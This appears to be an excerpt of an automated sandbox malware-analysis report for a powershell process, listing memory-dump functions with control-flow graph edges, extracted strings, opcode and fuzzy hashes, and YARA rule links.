                                                                                      control_flow_graph 1229 816a157-816a16a 1230 816a170-816a1f4 1229->1230 1231 816abdc-816ac25 1229->1231 1242 816a1f6-816a21b 1230->1242 1243 816a223-816a2a0 1230->1243 1245 81697a6-81697ca 1231->1245 1246 816979f 1231->1246 1242->1243 1265 816a2a2-816a2c7 1243->1265 1266 816a2cf-816a2dc 1243->1266 1249 81697cc-81697f1 1245->1249 1250 81697f9-8169859 1245->1250 1246->1245 1248 8169860-8169884 1246->1248 1252 8169886-81698ab 1248->1252 1253 81698b3-81698c0 1248->1253 1249->1250 1250->1248 1252->1253 1253->1231 1256 81698c6-81698f4 1253->1256 1256->1231 1262 81698fa-8169928 1256->1262 1262->1231 1268 816992e-816995c 1262->1268 1265->1266 1266->1231 1269 816a2e2-816a330 1266->1269 1268->1231 1274 8169962-8169a3f 1268->1274 1269->1231 1279 816a336-816a352 1269->1279 1294 8169d05-8169d29 1274->1294 1295 8169a45-8169a5f 1274->1295 1279->1231 1282 816a358-816a395 1279->1282 1282->1231 1288 816a39b-816a3d9 1282->1288 1288->1231 1293 816a3df-816a4a6 1288->1293 1293->1231 1326 816a4ac-816a4fc 1293->1326 1298 8169d2b-8169d50 1294->1298 1299 8169d58-8169e6e 1294->1299 1296 8169a61-8169a86 1295->1296 1297 8169a8e-8169a9b 1295->1297 1296->1297 1301 8169aa1-8169ae5 1297->1301 1302 8169cbc-8169d00 1297->1302 1298->1299 1343 8169e74-8169e8e 1299->1343 1344 816a0d1-816a0ff 1299->1344 1301->1302 1314 8169aeb-8169b0b 1301->1314 1302->1294 1314->1302 1321 8169b11-8169b44 1314->1321 1321->1302 1329 8169b4a-8169baa 1321->1329 1326->1231 1337 816a502-816a55e 1326->1337 1329->1302 1341 8169bb0-8169c5e 1329->1341 1357 816a563-816a5aa 1337->1357 1341->1302 1370 8169c60-8169c92 1341->1370 1351 8169e90-8169e9c 1343->1351 1352 8169eb8 1343->1352 1368 816a104-816a154 1344->1368 1354 8169ea6-8169eac 1351->1354 1355 8169e9e-8169ea4 1351->1355 1356 8169ebe-8169f0c 1352->1356 1359 8169eb6 1354->1359 1355->1359 1356->1344 1375 8169f12-8169f27 1356->1375 1364 816a5ac-816a5d1 1357->1364 1365 816a5d9-816a60e 1357->1365 1359->1356 1364->1365 1365->1231 1374 816a614-816a638 1365->1374 1368->1231 1388 8169c97-8169cba 1370->1388 1374->1231 1381 816a63e-816a69a 1374->1381 1383 8169f41-8169f76 1375->1383 1384 8169f29-8169f2f 1375->1384 1402 816a6bf-816a6c5 1381->1402 1403 816a69c-816a6b1 1381->1403 1383->1344 1395 8169f7c-8169f9c 1383->1395 1386 8169f33-8169f3f 1384->1386 1387 8169f31 1384->1387 1386->1383 1387->1383 1388->1294 1395->1344 1399 8169fa2-816a086 1395->1399 1399->1344 1428 816a088-816a0cf 1399->1428 1404 816a6cb-816a712 1402->1404 1403->1404 1409 816a714-816a739 1404->1409 1410 816a741-816a74e 1404->1410 1409->1410 1410->1231 1411 816a754-816a782 1410->1411 1411->1231 1415 816a788-816a7b6 1411->1415 1415->1231 1419 816a7bc-816a7ea 1415->1419 1419->1231 1423 816a7f0-816a8cd 1419->1423 1439 816a8d3-816a8ed 1423->1439 1440 816ac2a-816ad32 1423->1440 1428->1368 1442 816a8ef-816a914 1439->1442 1443 816a91c-816a929 1439->1443 1447 816ad34-816ad59 1440->1447 1448 816ad61-816ad96 1440->1448 1442->1443 1445 816ab91-816abda 1443->1445 1446 816a92f-816a973 1443->1446 1445->1231 1445->1440 1446->1445 1458 816a979-816a999 1446->1458 1447->1448 1456 816ae81-816aec5 1448->1456 1457 816ad9c-816adca 1448->1457 1476 816aeca 1456->1476 1457->1456 1463 816add0-816ae42 1457->1463 1458->1445 1466 816a99f-816a9d2 1458->1466 1481 816ae44-816ae5f 1463->1481 1482 816ae70-816ae76 1463->1482 1466->1445 1475 816a9d8-816aa38 1466->1475 1475->1445 1484 816aa3e-816aa9e 1475->1484 1476->1476 1482->1456 1484->1445 1489 816aaa4-816ab2d 1484->1489 1489->1445 1494 816ab2f-816ab8c 1489->1494 1494->1440
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2623383395.0000000008160000.00000040.00000800.00020000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_8160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (fol$(fol$(fol$,Fak$,Fak$,Fak$4'fq$4'fq$x.`k$-`k
                                                                                      • API String ID: 0-1442047445
                                                                                      • Opcode ID: 8c1d7e1e65a7327bf132dfdf4f8f53f894249f3a3fd42822780ebb303854e1de
                                                                                      • Instruction ID: 66fa996b2faf9eecdc54f97e0693a42337fb915df53bc9494e65fb5526ecc318
                                                                                      • Opcode Fuzzy Hash: 8c1d7e1e65a7327bf132dfdf4f8f53f894249f3a3fd42822780ebb303854e1de
                                                                                      • Instruction Fuzzy Hash: B9C23CB5A002149FD754DF18C940B99BBB2FF89304F1481E9EA09AB355CB71EE82CF95
                                                                                      Function 08161AF0 Relevance: 13.5, Strings: 10, Instructions: 1026COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2623383395.0000000008160000.00000040.00000800.00020000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_8160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq$4'fq$4'fq$4'fq$84ml$84ml$tPfq$tPfq$x.`k$-`k
                                                                                      • API String ID: 0-3388586550
                                                                                      • Opcode ID: 4b308ea8dadcf2b6b50310c140b94fa007c8bb096027695868da54c0f7b780b3
                                                                                      • Instruction ID: 0c7bcbf48fc40680773b2c1c707d38fdc82547c1079521dba1787f27532780eb
                                                                                      • Opcode Fuzzy Hash: 4b308ea8dadcf2b6b50310c140b94fa007c8bb096027695868da54c0f7b780b3
                                                                                      • Instruction Fuzzy Hash: 3E829034B00218DFDB14DF68C441BAEBBB2EF84315F1484A9D949AB751CB31ED96CBA1
                                                                                      Function 08169783 Relevance: 10.6, Strings: 8, Instructions: 572COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1779 8169783-8169785 1780 816978b-816979d 1779->1780 1781 81697a6-81697ca 1780->1781 1782 816979f 1780->1782 1784 81697cc-81697f1 1781->1784 1785 81697f9-8169859 1781->1785 1782->1781 1783 8169860-8169884 1782->1783 1786 8169886-81698ab 1783->1786 1787 81698b3-81698c0 1783->1787 1784->1785 1785->1783 1786->1787 1789 81698c6-81698f4 1787->1789 1790 816abdc-816ac25 1787->1790 1789->1790 1796 81698fa-8169928 1789->1796 1790->1780 1796->1790 1801 816992e-816995c 1796->1801 1801->1790 1805 8169962-8169a3f 1801->1805 1815 8169d05-8169d29 1805->1815 1816 8169a45-8169a5f 1805->1816 1819 8169d2b-8169d50 1815->1819 1820 8169d58-8169e6e 1815->1820 1817 8169a61-8169a86 1816->1817 1818 8169a8e-8169a9b 1816->1818 1817->1818 1821 8169aa1-8169ae5 1818->1821 1822 8169cbc-8169d00 1818->1822 1819->1820 1852 8169e74-8169e8e 1820->1852 1853 816a0d1-816a0ff 1820->1853 1821->1822 1832 8169aeb-8169b0b 1821->1832 1822->1815 1832->1822 1837 8169b11-8169b44 1832->1837 1837->1822 1842 8169b4a-8169baa 1837->1842 1842->1822 1850 8169bb0-8169c5e 1842->1850 1850->1822 1872 8169c60-8169c77 1850->1872 1858 8169e90-8169e9c 1852->1858 1859 8169eb8 1852->1859 1871 816a104-816a154 1853->1871 1861 8169ea6-8169eac 1858->1861 1862 8169e9e-8169ea4 1858->1862 1863 8169ebe-8169f0c 1859->1863 1865 8169eb6 1861->1865 1862->1865 1863->1853 1875 8169f12-8169f27 1863->1875 1865->1863 1871->1790 1879 8169c82-8169c92 1872->1879 1881 8169f41-8169f76 1875->1881 1882 8169f29-8169f2f 1875->1882 1886 8169c97-8169cba 1879->1886 1881->1853 1891 8169f7c-8169f9c 1881->1891 1884 8169f33-8169f3f 1882->1884 1885 8169f31 1882->1885 1884->1881 1885->1881 1886->1815 1891->1853 1893 8169fa2-816a086 1891->1893 1893->1853 1904 816a088-816a0cf 1893->1904 1904->1871
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2623383395.0000000008160000.00000040.00000800.00020000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_8160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (fol$,Fak$4'fq$4'fq$4'fq$4'fq$x.`k$-`k
                                                                                      • API String ID: 0-1773547059
                                                                                      • Opcode ID: 69f770dab459235a8df902648e15b6662fdd98c7b0211a0d30ff41621a2f5325
                                                                                      • Instruction ID: 3c5bf3168d271edd98901bb3a94e813ae7dc24fd83de69af4ebd9c0d57cb8c05
                                                                                      • Opcode Fuzzy Hash: 69f770dab459235a8df902648e15b6662fdd98c7b0211a0d30ff41621a2f5325
                                                                                      • Instruction Fuzzy Hash: 31424EB1A002149FDB54DF18C954B9ABBB2FF84304F1481E9DA09AB355CB71EE82CF95
                                                                                      Function 081667F8 Relevance: 8.0, Strings: 6, Instructions: 503COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1909 81667f8-816681b 1910 8166821-8166826 1909->1910 1911 816696c-816697c 1909->1911 1912 816683e-8166842 1910->1912 1913 8166828-816682e 1910->1913 1920 81669e7 1911->1920 1921 816697e-81669a1 1911->1921 1917 8166848-816684a 1912->1917 1918 8166919-8166923 1912->1918 1915 8166832-816683c 1913->1915 1916 8166830 1913->1916 1915->1912 1916->1912 1917->1918 1919 8166850-8166854 1917->1919 1922 8166925-816692e 1918->1922 1923 8166931-8166937 1918->1923 1924 8166856-8166872 1919->1924 1925 8166874 1919->1925 1926 8166a42-8166a4c 1920->1926 1927 81669e9-81669f3 1920->1927 1928 81669e3 1921->1928 1929 81669a3-81669b6 1921->1929 1930 816693d-8166949 1923->1930 1931 8166939-816693b 1923->1931 1937 8166876-8166878 1924->1937 1925->1937 1933 8166a4e-8166a55 1926->1933 1934 8166a58-8166a5e 1926->1934 1935 8166a8e-8166ad5 1927->1935 1936 81669f9-81669fe 1927->1936 1938 81669e5 1928->1938 1929->1935 1952 81669bc-81669c1 1929->1952 1939 816694b-8166969 1930->1939 1931->1939 1940 8166a64-8166a70 1934->1940 1941 8166a60-8166a62 1934->1941 1962 8166c26-8166c6a 1935->1962 1963 8166adb-8166ae0 1935->1963 1943 8166a16-8166a1a 1936->1943 1944 8166a00-8166a06 1936->1944 1937->1918 1945 816687e-8166887 1937->1945 1938->1920 1948 8166a72-8166a8b 1940->1948 1941->1948 1943->1926 1951 8166a1c-8166a1e 1943->1951 1949 8166a0a-8166a14 1944->1949 1950 8166a08 1944->1950 1945->1918 1970 816688d-81668a0 1945->1970 1949->1943 1950->1943 1957 8166a20-8166a26 1951->1957 1958 8166a38-8166a3f 1951->1958 1960 81669c3-81669c9 1952->1960 1961 81669d9-81669e1 1952->1961 1968 8166a2a-8166a36 1957->1968 1969 8166a28 1957->1969 1972 81669cd-81669d7 1960->1972 1973 81669cb 1960->1973 1961->1938 1983 8166c70-8166c75 1962->1983 1984 8166e0f-8166e31 1962->1984 1965 8166ae2-8166ae8 1963->1965 1966 8166af8-8166afc 1963->1966 1974 8166aec-8166af6 1965->1974 1975 8166aea 1965->1975 1976 8166bd6-8166be0 1966->1976 1977 8166b02-8166b04 1966->1977 1968->1958 1969->1958 2003 81668a5-81668a7 1970->2003 1972->1961 1973->1961 1974->1966 1975->1966 1986 8166be2-8166beb 1976->1986 1987 8166bee-8166bf4 1976->1987 1980 8166b06-8166b17 1977->1980 1981 8166b47 1977->1981 1980->1962 2009 8166b1d-8166b25 1980->2009 1989 8166b49-8166b4b 1981->1989 1993 8166c77-8166c7d 1983->1993 1994 8166c8d-8166c91 1983->1994 1990 8166bf6-8166bf8 1987->1990 1991 8166bfa-8166c06 1987->1991 1989->1976 1995 8166b51-8166b53 1989->1995 1996 8166c08-8166c23 1990->1996 1991->1996 1997 8166c81-8166c8b 1993->1997 1998 8166c7f 1993->1998 2000 8166db7-8166dc1 1994->2000 2001 8166c97-8166c9b 1994->2001 2006 8166b55-8166b5b 1995->2006 2007 8166b6d-8166b79 1995->2007 1997->1994 1998->1994 2012 8166dc3-8166dcc 2000->2012 2013 8166dcf-8166dd5 2000->2013 2010 8166c9d-8166cae 2001->2010 2011 8166cdb 2001->2011 2004 81668bf-8166916 2003->2004 2005 81668a9-81668af 2003->2005 2015 81668b3-81668b5 2005->2015 2016 81668b1 2005->2016 2019 8166b5f-8166b6b 2006->2019 2020 8166b5d 2006->2020 2036 8166b91-8166bd3 2007->2036 2037 8166b7b-8166b81 2007->2037 2023 8166b27-8166b2d 2009->2023 2024 8166b3d-8166b45 2009->2024 2010->1984 2032 8166cb4-8166cb9 2010->2032 2025 8166cdd-8166cdf 2011->2025 2017 8166dd7-8166dd9 2013->2017 2018 8166ddb-8166de7 2013->2018 2015->2004 2016->2004 2028 8166de9-8166e0c 2017->2028 2018->2028 2019->2007 2020->2007 2030 8166b31-8166b3b 2023->2030 2031 8166b2f 2023->2031 2024->1989 2025->2000 2029 8166ce5-8166ce9 2025->2029 2029->2000 2035 8166cef-8166cf3 2029->2035 2030->2024 2031->2024 2043 8166cd1-8166cd9 2032->2043 2044 8166cbb-8166cc1 2032->2044 2035->2000 2046 8166cf9-8166d1a 2035->2046 2039 8166b85-8166b87 2037->2039 2040 8166b83 2037->2040 2039->2036 2040->2036 2043->2025 2047 8166cc5-8166ccf 2044->2047 2048 8166cc3 2044->2048 2046->2000 2053 8166d20-8166d24 2046->2053 2047->2043 2048->2043 2054 8166d26-8166d2f 2053->2054 2055 8166d47 2053->2055 2057 8166d36-8166d43 2054->2057 2058 8166d31-8166d34 2054->2058 2056 8166d4a-8166d57 2055->2056 2060 8166d5d-8166db4 2056->2060 2059 8166d45 2057->2059 2058->2059 2059->2056
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2623383395.0000000008160000.00000040.00000800.00020000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_8160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (ofq$(ofq$4'fq$4'fq$4'fq$4'fq
                                                                                      • API String ID: 0-2405934209
                                                                                      • Opcode ID: dd3f40cb08e399ab6bf8b24ba9a810eb5afefad23b867f16756b2148016addb5
                                                                                      • Instruction ID: f180029cca930e0b12ba128460eace47734e84641f3081f3f8bc70c1ef155026
                                                                                      • Opcode Fuzzy Hash: dd3f40cb08e399ab6bf8b24ba9a810eb5afefad23b867f16756b2148016addb5
                                                                                      • Instruction Fuzzy Hash: F8020671B04205CFCB549F69C8446ABBBB6EF95322F18C06ED585CB291DB32D872C7A1
                                                                                      Function 073D9975 Relevance: 6.7, Strings: 5, Instructions: 475COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (fol$(fol$4'fq$h2bk$x.`k
                                                                                      • API String ID: 0-2674355033
                                                                                      • Opcode ID: eb8fbd9044ee8ffdee196bc6ee050314beffe91b1ee4d99da0228300595aca26
                                                                                      • Instruction ID: ae515ececa800e4ca4413d84b60242ed6b5921add0c3d196b3fb64fba68b1503
                                                                                      • Opcode Fuzzy Hash: eb8fbd9044ee8ffdee196bc6ee050314beffe91b1ee4d99da0228300595aca26
                                                                                      • Instruction Fuzzy Hash: 9C121AB6B01205DFEB14CF58D580B69BBB6EF85314F25C069E8099B756CB72EC42CB81
                                                                                      Function 073D9398 Relevance: 5.5, Strings: 4, Instructions: 477COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (fol$(fol$4'fq$x.`k
                                                                                      • API String ID: 0-2621465603
                                                                                      • Opcode ID: 92efe23b5447e4aef87563cf951aedcf50d2da3c9a4b49a84b7cc0ffa30ff36d
                                                                                      • Instruction ID: bb9ae95ab437608e861b35520f035df77040163bc11f7c5163a65154862c7e68
                                                                                      • Opcode Fuzzy Hash: 92efe23b5447e4aef87563cf951aedcf50d2da3c9a4b49a84b7cc0ffa30ff36d
                                                                                      • Instruction Fuzzy Hash: 16124BB6A01205DFEB14CF58D584B69BBB2FF85304F25C069E8199B756CB72EC42CB81
                                                                                      Function 073D0488 Relevance: 5.2, Strings: 4, Instructions: 156COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3200 73d0488-73d04ab 3201 73d04b1-73d04b6 3200->3201 3202 73d0650-73d06a5 3200->3202 3203 73d04ce-73d04d2 3201->3203 3204 73d04b8-73d04be 3201->3204 3205 73d05fd-73d0607 3203->3205 3206 73d04d8-73d04da 3203->3206 3208 73d04c0 3204->3208 3209 73d04c2-73d04cc 3204->3209 3213 73d0609-73d0612 3205->3213 3214 73d0615-73d061b 3205->3214 3210 73d04dc-73d04e8 3206->3210 3211 73d04ea 3206->3211 3208->3203 3209->3203 3215 73d04ec-73d04ee 3210->3215 3211->3215 3217 73d061d-73d061f 3214->3217 3218 73d0621-73d062d 3214->3218 3215->3205 3219 73d04f4-73d0513 3215->3219 3220 73d062f-73d064d 3217->3220 3218->3220 3228 73d0515-73d0530 3219->3228 3229 73d0532 3219->3229 3230 73d0534-73d0536 3228->3230 3229->3230 3230->3205 3232 73d053c-73d0540 3230->3232 3232->3205 3233 73d0546-73d0565 3232->3233 3237 73d057d-73d0582 3233->3237 3238 73d0567-73d056d 3233->3238 3241 73d0589-73d058b 3237->3241 3239 73d056f 3238->3239 3240 73d0571-73d0573 3238->3240 3239->3237 3240->3237 3242 73d058d-73d0593 3241->3242 3243 73d05a3-73d05fa 3241->3243 3244 73d0595 3242->3244 3245 73d0597-73d0599 3242->3245 3244->3243 3245->3243
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq$4'fq$el$el
                                                                                      • API String ID: 0-1527105543
                                                                                      • Opcode ID: 39edf5eec24861ab208da326cea2c24ed5142895f2f8f6f52b102bbb0d297ece
                                                                                      • Instruction ID: 1056f58d39abe19d9f8a8a7675c216b29c473468d0606ca8e184dc35c7ebf1f2
                                                                                      • Opcode Fuzzy Hash: 39edf5eec24861ab208da326cea2c24ed5142895f2f8f6f52b102bbb0d297ece
                                                                                      • Instruction Fuzzy Hash: 434139F2B182068FEB195A78A41177E7BA3AFC1600F14407AD909CB691DF35DC81C7A2
                                                                                      Function 073D6AE0 Relevance: 5.1, Strings: 4, Instructions: 124COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3247 73d6ae0-73d6af2 3250 73d6af8-73d6b09 3247->3250 3251 73d6bb2-73d6c2c 3247->3251 3255 73d6b0b-73d6b11 3250->3255 3256 73d6b23-73d6b40 3250->3256 3268 73d6c2e-73d6c3c 3251->3268 3269 73d6c58-73d6c5d 3251->3269 3257 73d6b15-73d6b21 3255->3257 3258 73d6b13 3255->3258 3256->3251 3261 73d6b42-73d6b64 3256->3261 3257->3256 3258->3256 3266 73d6b7e-73d6b96 3261->3266 3267 73d6b66-73d6b6c 3261->3267 3273 73d6b98-73d6b9a 3266->3273 3274 73d6ba4-73d6baf 3266->3274 3270 73d6b6e 3267->3270 3271 73d6b70-73d6b7c 3267->3271 3278 73d6c43-73d6c52 3268->3278 3269->3268 3270->3266 3271->3266 3273->3274 3278->3269
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 84ml$84ml$tPfq$tPfq
                                                                                      • API String ID: 0-3994916716
                                                                                      • Opcode ID: 4ddaf6b814cbc23152c8b302f8a70adf8d2999aa670f1a48afef7f6f9102cc68
                                                                                      • Instruction ID: 6eaad5b23c88b610bee3d345e9ddc44c00f04d6e10ac76841e0280577a4cabc7
                                                                                      • Opcode Fuzzy Hash: 4ddaf6b814cbc23152c8b302f8a70adf8d2999aa670f1a48afef7f6f9102cc68
                                                                                      • Instruction Fuzzy Hash: 0D416EB1B002149BD7209BA99811B6BBFF6AF85754F14805EE5589F3C5CB71DC4183E2
                                                                                      Function 073DA6C3 Relevance: 3.9, Strings: 3, Instructions: 140COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3279 73da6c3-73da70b 3280 73da99d-73da9b4 3279->3280 3281 73da711-73da716 3279->3281 3291 73da9d7-73da9e5 3280->3291 3292 73da9b6-73da9d4 3280->3292 3282 73da72e-73da732 3281->3282 3283 73da718-73da71e 3281->3283 3284 73da738-73da73c 3282->3284 3285 73da94a-73da954 3282->3285 3287 73da720 3283->3287 3288 73da722-73da72c 3283->3288 3289 73da74f 3284->3289 3290 73da73e-73da74d 3284->3290 3293 73da956-73da95f 3285->3293 3294 73da962-73da968 3285->3294 3287->3282 3288->3282 3296 73da751-73da753 3289->3296 3290->3296 3297 73da9eb-73da9f0 3291->3297 3298 73dabf4-73dac29 3291->3298 3292->3291 3299 73da96e-73da97a 3294->3299 3300 73da96a-73da96c 3294->3300 3296->3285 3301 73da759-73da75b 3296->3301 3302 73daa08-73daa14 3297->3302 3303 73da9f2-73da9f8 3297->3303 3313 73dac2b 3298->3313 3314 73dac30-73dac37 3298->3314 3304 73da97c-73da99a 3299->3304 3300->3304 3306 73da75d-73da778 3301->3306 3307 73da77a 3301->3307 3316 73dab9e-73daba8 3302->3316 3317 73daa1a-73daa1d 3302->3317 3308 73da9fc-73daa06 3303->3308 3309 73da9fa 3303->3309 3315 73da77c-73da77e 3306->3315 3307->3315 3308->3302 3309->3302 3313->3314 3318 73dac3e-73dac4f 3314->3318 3319 73dac39 3314->3319 3315->3285 3322 73da784-73da7b0 3315->3322 3325 73dabaa-73dabb3 3316->3325 3326 73dabb6-73dabbc 3316->3326 3317->3316 3323 73daa23-73daa2a 3317->3323 3331 73dac55-73dac84 3318->3331 3319->3318 3322->3285 3349 73da7b6-73da7c3 3322->3349 3323->3298 3328 73daa30-73daa35 3323->3328 3329 73dabbe-73dabc0 3326->3329 3330 73dabc2-73dabce 3326->3330 3333 73daa4d-73daa51 3328->3333 3334 73daa37-73daa3d 3328->3334 3335 73dabd0-73dabf1 3329->3335 3330->3335 3341 73dac89-73dac9c 3331->3341 3333->3316 3339 73daa57-73daa5b 3333->3339 3337 73daa3f 3334->3337 3338 73daa41-73daa4b 3334->3338 3337->3333 3338->3333 3342 73daa5d-73daa6c 3339->3342 3343 73daa6e 3339->3343 3347 73daa70-73daa72 3342->3347 3343->3347 3347->3316 3350 73daa78-73daa7a 3347->3350 3352 73da85c-73da89b 3349->3352 3353 73da7c9-73da7ce 3349->3353 3354 73daa7c-73daa88 3350->3354 3355 73daa8a 3350->3355 3388 73da8a2-73da8a6 3352->3388 3357 73da7e6-73da7ff 3353->3357 3358 73da7d0-73da7d6 3353->3358 3356 73daa8c-73daa8e 3354->3356 3355->3356 3356->3316 3359 73daa94-73daa9c 3356->3359 3357->3352 3371 73da801-73da823 3357->3371 3360 73da7d8 3358->3360 3361 73da7da-73da7e4 3358->3361 3363 73daa9e-73daaa4 3359->3363 3364 73daaba 3359->3364 3360->3357 3361->3357 3367 73daaaa-73daab6 3363->3367 3368 73daaa6-73daaa8 3363->3368 3369 73daabc-73daac7 3364->3369 3372 73daab8 3367->3372 3368->3372 3369->3316 3379 73daacd-73daae7 3369->3379 3377 73da83d-73da847 3371->3377 3378 73da825-73da82b 3371->3378 3372->3369 3383 73da84c-73da85a 3377->3383 3380 73da82d 3378->3380 3381 73da82f-73da83b 3378->3381 3385 73daae9-73daaf2 3379->3385 3386 73dab0a 3379->3386 3380->3377 3381->3377 3383->3388 3389 73daaf9-73dab06 3385->3389 3390 73daaf4-73daaf7 3385->3390 3391 73dab0d-73dab2c 3386->3391 3392 73da8c9 3388->3392 3393 73da8a8-73da8b1 3388->3393 3395 73dab08 3389->3395 3390->3395 3411 73dab2e-73dab34 3391->3411 3412 73dab44-73dab9b 3391->3412 3398 73da8cc-73da8d8 3392->3398 3396 73da8b8-73da8c5 3393->3396 3397 73da8b3-73da8b6 3393->3397 3395->3391 3401 73da8c7 3396->3401 3397->3401 3404 73da8da-73da8e0 3398->3404 3405 73da8f0-73da947 3398->3405 3401->3398 3407 73da8e4-73da8e6 3404->3407 3408 73da8e2 3404->3408 3407->3405 3408->3405 3414 73dab38-73dab3a 3411->3414 3415 73dab36 3411->3415 3414->3412 3415->3412
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq$84ml$tPfq
                                                                                      • API String ID: 0-3129333961
                                                                                      • Opcode ID: d244681af6f59f8934529d298ab824ded9e3da265c8f14a2d4acf9e4a9e674c8
                                                                                      • Instruction ID: 855fe29d2d3ba039750d5c217f0545b8874ead5f4656262b044249f7fd1addfc
                                                                                      • Opcode Fuzzy Hash: d244681af6f59f8934529d298ab824ded9e3da265c8f14a2d4acf9e4a9e674c8
                                                                                      • Instruction Fuzzy Hash: BE41C2F2B002059FEB148F68E644BAABBF6BF85310F19C499E80D9B691DB71DC41CB51
                                                                                      Function 06F4DE00 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3416 6f4de00-6f4de12 3417 6f4df06-6f4df2b 3416->3417 3418 6f4de18-6f4de1a 3416->3418 3420 6f4df32-6f4df56 3417->3420 3419 6f4de20-6f4de2c 3418->3419 3418->3420 3425 6f4de40-6f4de50 3419->3425 3426 6f4de2e-6f4de3a 3419->3426 3432 6f4df5d-6f4df81 3420->3432 3425->3432 3433 6f4de56-6f4de64 3425->3433 3426->3425 3426->3432 3436 6f4df88-6f4e00d call 6f4b348 3432->3436 3433->3436 3437 6f4de6a-6f4de6f 3433->3437 3461 6f4e012-6f4e020 call 6f4d290 3436->3461 3470 6f4de71 call 6f4de00 3437->3470 3471 6f4de71 call 6f4dff0 3437->3471 3472 6f4de71 call 6f4ddf0 3437->3472 3473 6f4de71 call 6f4e000 3437->3473 3439 6f4de77-6f4dec0 3454 6f4dec2-6f4dedb 3439->3454 3455 6f4dee3-6f4df03 call 6f4c090 3439->3455 3454->3455 3466 6f4e022-6f4e028 3461->3466 3467 6f4e038-6f4e03a 3461->3467 3468 6f4e02c-6f4e02e 3466->3468 3469 6f4e02a 3466->3469 3468->3467 3469->3467 3470->3439 3471->3439 3472->3439 3473->3439
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (jq$Hjq
                                                                                      • API String ID: 0-2151573235
                                                                                      • Opcode ID: dc417229816fa6b6f58109b0bfef3c4356d36cc4d63e6a984c77e0371f247572
                                                                                      • Instruction ID: 3f4cb77aac96bfbc389102443193ae985b6eaf5c6c1fd194d4564f1012c07ca9
                                                                                      • Opcode Fuzzy Hash: dc417229816fa6b6f58109b0bfef3c4356d36cc4d63e6a984c77e0371f247572
                                                                                      • Instruction Fuzzy Hash: 4E51A030B002158FDBA9AF78C89466E7BB2AFC9711B14446DD9069B3A5DF31EC07CB91
                                                                                      Function 073D6E1B Relevance: 2.6, Strings: 2, Instructions: 59COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
